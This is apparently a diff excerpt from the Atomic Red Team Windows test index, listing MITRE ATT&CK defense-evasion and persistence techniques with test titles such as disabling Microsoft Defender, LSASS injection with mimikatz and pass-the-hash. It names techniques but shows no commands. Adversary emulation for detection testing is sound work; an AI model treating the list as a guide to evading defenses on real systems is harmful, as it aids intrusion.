- Atomic Test #2: Disable Microsoft Defender Firewall via Registry [windows]
- Atomic Test #2: Disable Microsoft Defender Firewall [windows]
- Atomic Test #3: Allow SMB and RDP on Microsoft Defender Firewall [windows]
- Atomic Test #4: Opening ports for proxy - HARDRAIN [windows]
- Atomic Test #5: Open a local port through Windows Firewall to any profile [windows]
@@ -448,24 +205,14 @@
- Atomic Test #22: Tamper with Windows Defender Evade Scanning -Folder [windows]
- Atomic Test #23: Tamper with Windows Defender Evade Scanning -Extension [windows]
- Atomic Test #24: Tamper with Windows Defender Evade Scanning -Process [windows]
- Atomic Test #26: Disable Windows Defender with DISM [windows]
- Atomic Test #27: Disable Defender with Defender Control [windows]
- Atomic Test #28: Disable Defender Using NirSoft AdvancedRun [windows]
- Atomic Test #29: Kill antimalware protected processes using Backstab [windows]
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.007 Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.010 Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1055.001 Dynamic-link Library Injection](../../T1055.001/T1055.001.md)
- Atomic Test #1: Process Injection via mavinject.exe [windows]
- T1564.008 Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.011 Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.001 Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.011 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1070.004 File Deletion](../../T1070.004/T1070.004.md)
- Atomic Test #4: Delete a single file - Windows cmd [windows]
- Atomic Test #5: Delete an entire folder - Windows cmd [windows]
@@ -473,29 +220,19 @@
- Atomic Test #7: Delete an entire folder - Windows PowerShell [windows]
- Atomic Test #9: Delete Prefetch File [windows]
- Atomic Test #10: Delete TeamViewer Log Files [windows]
- T1222 File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1484.001 Group Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.006 HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.005 Hidden File System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1222 File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1484 Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1564.005 Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1564.001 Hidden Files and Directories](../../T1564.001/T1564.001.md)
- Atomic Test #3: Create Windows System File with Attrib [windows]
- Atomic Test #4: Create Windows Hidden File with Attrib [windows]
- Atomic Test #8: Hide Files Through Registry [windows]
- T1564.002 Hidden Users [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1564.003 Hidden Window](../../T1564.003/T1564.003.md)
- Atomic Test #1: Hidden Window [windows]
- [T1564 Hide Artifacts](../../T1564/T1564.md)
- Atomic Test #1: Extract binary files via VBA [windows]
- Atomic Test #2: Create a Hidden User Called "$" [windows]
- Atomic Test #3: Create an "Administrator " user (with a space on the end) [windows]
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.003 Impair Command History Logging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562 Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.006 Indicator Blocking](../../T1562.006/T1562.006.md)
- Atomic Test #3: Disable Powershell ETW Provider - Windows [windows]
- Atomic Test #4: Disable .NET Event Tracing for Windows Via Registry (cmd) [windows]
- Atomic Test #5: Disable .NET Event Tracing for Windows Via Registry (powershell) [windows]
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564 Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1562 Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1562.006 Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1070 Indicator Removal on Host](../../T1070/T1070.md)
- Atomic Test #1: Indicator Removal using FSUtil [windows]
- [T1202 Indirect Command Execution](../../T1202/T1202.md)
@@ -504,8 +241,6 @@
- Atomic Test #3: Indirect Command Execution - conhost.exe [windows]
- [T1553.004 Install Root Certificate](../../T1553.004/T1553.004.md)
- Atomic Test #4: Install root CA on Windows [windows]
- Atomic Test #5: Install root CA on Windows with certutil [windows]
- Atomic Test #6: Add Root Certificate to CurrentUser Certificate Store [windows]
- [T1218.004 InstallUtil](../../T1218.004/T1218.004.md)
- Atomic Test #1: CheckIfInstallable method call [windows]
- Atomic Test #2: InstallHelper method call [windows]
@@ -515,63 +250,23 @@
- Atomic Test #6: InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant [windows]
- Atomic Test #7: InstallUtil HelpText method call [windows]
- Atomic Test #8: InstallUtil evasive invocation [windows]
- T1036.001 Invalid Code Signature [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #1: Create local account with admin privileges [windows]
- T1218.014 MMC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.001 Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1127.001 MSBuild](../../T1127.001/T1127.001.md)
- Atomic Test #1: MSBuild Bypass Using Inline Tasks (C#) [windows]
- Atomic Test #2: MSBuild Bypass Using Inline Tasks (VB) [windows]
- T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1553.005 Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md)
- Atomic Test #1: Mount ISO image [windows]
- Atomic Test #2: Mount an ISO image and run executable from the ISO [windows]
- Atomic Test #3: Remove the Zone.Identifier alternate data stream [windows]
- Atomic Test #1: MSBuild Bypass Using Inline Tasks [windows]
- T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1036.004 Masquerade Task or Service](../../T1036.004/T1036.004.md)
- Atomic Test #1: Creating W32Time similar named service using schtasks [windows]
- Atomic Test #2: Creating W32Time similar named service using sc [windows]
- [T1036 Masquerading](../../T1036/T1036.md)
- Atomic Test #1: System File Copied to Unusual Location [windows]
- Atomic Test #2: Malware Masquerading and Execution from Zip File [windows]
- [T1036.005 Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
- Atomic Test #2: Masquerade as a built-in system executable [windows]
- T1218.013 Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036 Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1036.005 Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1112 Modify Registry](../../T1112/T1112.md)
- Atomic Test #1: Modify Registry of Current User Profile - cmd [windows]
- Atomic Test #2: Modify Registry of Local Machine - cmd [windows]
- Atomic Test #3: Modify registry to store logon credentials [windows]
- Atomic Test #4: Add domain to Trusted sites Zone [windows]
- Atomic Test #5: Javascript in registry [windows]
- Atomic Test #6: Change Powershell Execution Policy to Bypass [windows]
- Atomic Test #7: BlackByte Ransomware Registry Changes - CMD [windows]
- Atomic Test #8: BlackByte Ransomware Registry Changes - Powershell [windows]
- Atomic Test #9: Disable Windows Registry Tool [windows]
- Atomic Test #10: Disable Windows CMD application [windows]
- Atomic Test #11: Disable Windows Task Manager application [windows]
- Atomic Test #12: Disable Windows Notification Center [windows]
- Atomic Test #13: Disable Windows Shutdown Button [windows]
- Atomic Test #14: Disable Windows LogOff Button [windows]
- Atomic Test #15: Disable Windows Change Password Feature [windows]
- Atomic Test #16: Disable Windows Lock Workstation Feature [windows]
- Atomic Test #17: Activate Windows NoDesktop Group Policy Feature [windows]
- Atomic Test #18: Activate Windows NoRun Group Policy Feature [windows]
- Atomic Test #19: Activate Windows NoFind Group Policy Feature [windows]
- Atomic Test #20: Activate Windows NoControlPanel Group Policy Feature [windows]
- Atomic Test #21: Activate Windows NoFileMenu Group Policy Feature [windows]
- Atomic Test #22: Activate Windows NoClose Group Policy Feature [windows]
- Atomic Test #23: Activate Windows NoSetTaskbar Group Policy Feature [windows]
- Atomic Test #24: Activate Windows NoTrayContextMenu Group Policy Feature [windows]
- Atomic Test #25: Activate Windows NoPropertiesMyDocuments Group Policy Feature [windows]
- Atomic Test #26: Hide Windows Clock Group Policy Feature [windows]
- Atomic Test #27: Windows HideSCAHealth Group Policy Feature [windows]
- Atomic Test #28: Windows HideSCANetwork Group Policy Feature [windows]
- Atomic Test #29: Windows HideSCAPower Group Policy Feature [windows]
- Atomic Test #30: Windows HideSCAVolume Group Policy Feature [windows]
- Atomic Test #31: Windows Modify Show Compress Color And Info Tip Registry [windows]
- Atomic Test #32: Windows Powershell Logging Disabled [windows]
- Atomic Test #33: Windows Add Registry Value to Load Service in Safe Mode without Network [windows]
- Atomic Test #34: Windows Add Registry Value to Load Service in Safe Mode with Network [windows]
- [T1218.005 Mshta](../../T1218.005/T1218.005.md)
- Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
- Atomic Test #2: Mshta executes VBScript to execute malicious command [windows]
@@ -582,19 +277,10 @@
- Atomic Test #7: Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler [windows]
- Atomic Test #8: Invoke HTML Application - JScript Engine with Inline Protocol Handler [windows]
- Atomic Test #9: Invoke HTML Application - Simulate Lateral Movement over UNC Path [windows]
- Atomic Test #10: Mshta used to Execute PowerShell [windows]
- [T1218.007 Msiexec](../../T1218.007/T1218.007.md)
- Atomic Test #1: Msiexec.exe - Execute Local MSI file with embedded JScript [windows]
- Atomic Test #2: Msiexec.exe - Execute Local MSI file with embedded VBScript [windows]
- Atomic Test #3: Msiexec.exe - Execute Local MSI file with an embedded DLL [windows]
- Atomic Test #4: Msiexec.exe - Execute Local MSI file with an embedded EXE [windows]
- Atomic Test #5: WMI Win32_Product Class - Execute Local MSI file with embedded JScript [windows]
- Atomic Test #6: WMI Win32_Product Class - Execute Local MSI file with embedded VBScript [windows]
- Atomic Test #7: WMI Win32_Product Class - Execute Local MSI file with an embedded DLL [windows]
- Atomic Test #8: WMI Win32_Product Class - Execute Local MSI file with an embedded EXE [windows]
- Atomic Test #9: Msiexec.exe - Execute the DllRegisterServer function of a DLL [windows]
- Atomic Test #10: Msiexec.exe - Execute the DllUnregisterServer function of a DLL [windows]
- Atomic Test #11: Msiexec.exe - Execute Remote MSI file [windows]
- Atomic Test #1: Msiexec.exe - Execute Local MSI file [windows]
- Atomic Test #2: Msiexec.exe - Execute Remote MSI file [windows]
- Atomic Test #3: Msiexec.exe - Execute Arbitrary DLL [windows]
- [T1564.004 NTFS File Attributes](../../T1564.004/T1564.004.md)
- Atomic Test #1: Alternate Data Streams (ADS) [windows]
- Atomic Test #2: Store file in Alternate Data Stream (ADS) [windows]
@@ -604,16 +290,10 @@
- Atomic Test #1: Add Network Share [windows]
- Atomic Test #2: Remove Network Share [windows]
- Atomic Test #3: Remove Network Share PowerShell [windows]
- Atomic Test #4: Disable Administrative Share Creation at Startup [windows]
- Atomic Test #5: Remove Administrative Shares [windows]
- [T1027 Obfuscated Files or Information](../../T1027/T1027.md)
- Atomic Test #2: Execute base64-encoded PowerShell [windows]
- Atomic Test #3: Execute base64-encoded PowerShell from Windows Registry [windows]
- Atomic Test #4: Execution from Compressed File [windows]
- Atomic Test #5: DLP Evasion via Sensitive Data in VBA Macro over email [windows]
- Atomic Test #6: DLP Evasion via Sensitive Data in VBA Macro over HTTP [windows]
- Atomic Test #7: Obfuscated Command in PowerShell [windows]
- Atomic Test #8: Obfuscated Command Line using special Unicode characters [windows]
- [T1218.008 Odbcconf](../../T1218.008/T1218.008.md)
- Atomic Test #1: Odbcconf.exe - Execute Arbitrary DLL [windows]
- [T1134.004 Parent PID Spoofing](../../T1134.004/T1134.004.md)
@@ -625,30 +305,25 @@
- [T1550.002 Pass the Hash](../../T1550.002/T1550.002.md)
- Atomic Test #1: Mimikatz Pass the Hash [windows]
- Atomic Test #2: crackmapexec Pass the Hash [windows]
- Atomic Test #3: Invoke-WMIExec Pass the Hash [windows]
- [T1550.003 Pass the Ticket](../../T1550.003/T1550.003.md)
- Atomic Test #1: Mimikatz Kerberos Ticket Attack [windows]
- Atomic Test #2: Rubeus Kerberos Pass The Ticket [windows]
- [T1556.002 Password Filter DLL](../../T1556.002/T1556.002.md)
- Atomic Test #1: Install and Register Password Filter DLL [windows]
- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.009 Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
- Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.002 Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.002 Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1055.012 Process Hollowing](../../T1055.012/T1055.012.md)
- Atomic Test #1: Process Hollowing using PowerShell [windows]
- Atomic Test #2: RunPE via VBA [windows]
- [T1055 Process Injection](../../T1055/T1055.md)
- Atomic Test #1: Shellcode execution via VBA [windows]
- Atomic Test #2: Remote Process Injection in LSASS via mimikatz [windows]
- Atomic Test #1: Process Injection via mavinject.exe [windows]
- [T1216.001 PubPrn](../../T1216.001/T1216.001.md)
- Atomic Test #1: PubPrn.vbs Signed Script Bypass [windows]
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1620 Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1218.009 Regsvcs/Regasm](../../T1218.009/T1218.009.md)
- Atomic Test #1: Regasm Uninstall Method Call Test [windows]
- Atomic Test #2: Regsvcs Uninstall Method Call Test [windows]
@@ -657,7 +332,6 @@
- Atomic Test #2: Regsvr32 remote COM scriptlet execution [windows]
- Atomic Test #3: Regsvr32 local DLL execution [windows]
- Atomic Test #4: Regsvr32 Registering Non DLL [windows]
- Atomic Test #5: Regsvr32 Silent DLL Install Call DllRegisterServer [windows]
- [T1036.003 Rename System Utilities](../../T1036.003/T1036.003.md)
- Atomic Test #1: Masquerading as Windows LSASS process [windows]
- Atomic Test #3: Masquerading - cscript.exe running as notepad.exe [windows]
@@ -667,14 +341,12 @@
- Atomic Test #7: Masquerading - windows exe running as different windows exe [windows]
- Atomic Test #8: Malicious process Masquerading as LSM.exe [windows]
- Atomic Test #9: File Extension Masquerading [windows]
- T1036.002 Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.002 Right-to-Left Override [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1207 Rogue Domain Controller](../../T1207/T1207.md)
- Atomic Test #1: DCShadow (Active Directory) [windows]
- T1014 Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1564.006 Run Virtual Instance](../../T1564.006/T1564.006.md)
- Atomic Test #1: Register Portable Virtualbox [windows]
- Atomic Test #2: Create and start VirtualBox virtual machine [windows]
- Atomic Test #3: Create and start Hyper-V virtual machine [windows]
- Atomic Test #1: DCShadow - Mimikatz [windows]
- [T1014 Rootkit](../../T1014/T1014.md)
- Atomic Test #3: Windows Signed Driver Rootkit Test [windows]
- T1564.006 Run Virtual Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1218.011 Rundll32](../../T1218.011/T1218.011.md)
- Atomic Test #1: Rundll32 execute JavaScript Remote Payload With GetObject [windows]
- Atomic Test #2: Rundll32 execute VBscript command [windows]
@@ -682,47 +354,31 @@
- Atomic Test #4: Rundll32 ieadvpack.dll Execution [windows]
- Atomic Test #5: Rundll32 syssetup.dll Execution [windows]
- Atomic Test #6: Rundll32 setupapi.dll Execution [windows]
- Atomic Test #7: Execution of HTA and VBS Files using Rundll32 and URL.dll [windows]
- Atomic Test #8: Launches an executable using Rundll32 and pcwutl.dll [windows]
- Atomic Test #9: Execution of non-dll using rundll32.exe [windows]
- Atomic Test #10: Rundll32 with Ordinal Value [windows]
- Atomic Test #11: Rundll32 with Control_RunDLL [windows]
- Atomic Test #12: Rundll32 with desk.cpl [windows]
- [T1134.005 SID-History Injection](../../T1134.005/T1134.005.md)
- Atomic Test #1: Injection SID-History with mimikatz [windows]
- T1553.003 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.009 Safe Mode Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1134.005 SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1553.003 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1574.011 Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
- Atomic Test #1: Service Registry Permissions Weakness [windows]
- Atomic Test #2: Service ImagePath Change with reg.exe [windows]
- [T1218 Signed Binary Proxy Execution](../../T1218/T1218.md)
- Atomic Test #1: mavinject - Inject DLL into running process [windows]
- Atomic Test #2: SyncAppvPublishingServer - Execute arbitrary PowerShell code [windows]
- Atomic Test #3: Register-CimProvider - Execute evil dll [windows]
- Atomic Test #4: InfDefaultInstall.exe .inf Execution [windows]
- Atomic Test #5: ProtocolHandler.exe Downloaded a Suspicious File [windows]
- Atomic Test #6: Microsoft.Workflow.Compiler.exe Payload Execution [windows]
- Atomic Test #7: Renamed Microsoft.Workflow.Compiler.exe Payload Executions [windows]
- Atomic Test #8: Invoke-ATHRemoteFXvGPUDisablementCommand base test [windows]
- Atomic Test #9: DiskShadow Command Execution [windows]
- Atomic Test #10: Load Arbitrary DLL via Wuauclt (Windows Update Client) [windows]
- [T1216 Signed Script Proxy Execution](../../T1216/T1216.md)
- Atomic Test #1: SyncAppvPublishingServer Signed Script PowerShell Command Execution [windows]
- Atomic Test #2: manage-bde.wsf Signed Script Command Execution [windows]
- T1027.002 Software Packing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.003 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1553 Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.002 Software Packing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1027.003 Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1553 Subvert Trust Controls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1497.001 System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #2: Detect Virtualization Environment (Windows) [windows]
- Atomic Test #4: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) [windows]
- T1542.001 System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1221 Template Injection](../../T1221/T1221.md)
- Atomic Test #1: WINWORD Remote Template Injection [windows]
- T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.001 System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1221 Template Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1070.006 Timestomp](../../T1070.006/T1070.006.md)
- Atomic Test #5: Windows - Modify file creation timestamp with PowerShell [windows]
- Atomic Test #6: Windows - Modify file last modified timestamp with PowerShell [windows]
@@ -731,20 +387,17 @@
- [T1134.001 Token Impersonation/Theft](../../T1134.001/T1134.001.md)
- Atomic Test #1: Named pipe client impersonation [windows]
- Atomic Test #2: `SeDebugPrivilege` token duplication [windows]
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1127 Trusted Developer Utilities Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1218.012 Verclsid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1127 Trusted Developer Utilities Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1222.001 Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md)
- Atomic Test #1: Take ownership using takeown utility [windows]
- Atomic Test #2: cacls - Grant permission to specified user or group recursively [windows]
- Atomic Test #3: attrib - Remove read-only attribute [windows]
- Atomic Test #4: attrib - hide file [windows]
- Atomic Test #5: Grant Full Access to folder for Everyone - Ryuk Ransomware Style [windows]
- Atomic Test #4: Grant Full Access to Entire C:\ Drive for Everyone - Ryuk Ransomware Style [windows]
- [T1220 XSL Script Processing](../../T1220/T1220.md)
- Atomic Test #1: MSXSL Bypass using local files [windows]
- Atomic Test #2: MSXSL Bypass using remote files [windows]
@@ -754,15 +407,11 @@
# persistence
- [T1546.008 Accessibility Features](../../T1546.008/T1546.008.md)
- Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
- Atomic Test #2: Replace binary of sticky keys [windows]
- [T1098 Account Manipulation](../../T1098/T1098.md)
- Atomic Test #1: Admin Account Manipulate [windows]
- Atomic Test #2: Domain Account and Group Manipulate [windows]
- Atomic Test #9: Password Change on Directory Service Restore Mode (DSRM) Account [windows]
- T1547.014 Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1137.006 Add-ins](../../T1137.006/T1137.006.md)
- Atomic Test #1: Code Executed Via Excel Add-in File (Xll) [windows]
- T1546.009 AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1546.009 AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.010 AppInit DLLs](../../T1546.010/T1546.010.md)
- Atomic Test #1: Install AppInit Shim [windows]
- [T1546.011 Application Shimming](../../T1546.011/T1546.011.md)
@@ -771,17 +420,15 @@
- Atomic Test #3: Registry key creation and/or modification events for SDB [windows]
- [T1053.002 At (Windows)](../../T1053.002/T1053.002.md)
- Atomic Test #1: At.exe Scheduled task [windows]
- [T1547.002 Authentication Package](../../T1547.002/T1547.002.md)
- Atomic Test #1: Authentication Package [windows]
- T1547.002 Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1197 BITS Jobs](../../T1197/T1197.md)
- Atomic Test #1: Bitsadmin Download (cmd) [windows]
- Atomic Test #2: Bitsadmin Download (PowerShell) [windows]
- Atomic Test #3: Persist, Download, & Execute [windows]
- Atomic Test #4: Bits download using desktopimgdownldr.exe (cmd) [windows]
- [T1547 Boot or Logon Autostart Execution](../../T1547/T1547.md)
- Atomic Test #1: Add a driver [windows]
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- Atomic Test #4: Bits download using destktopimgdownldr.exe (cmd) [windows]
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1542.003 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1176 Browser Extensions](../../T1176/T1176.md)
- Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos]
- Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]
@@ -793,74 +440,60 @@
- Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
- [T1546.001 Change Default File Association](../../T1546.001/T1546.001.md)
- Atomic Test #1: Change Default File Association [windows]
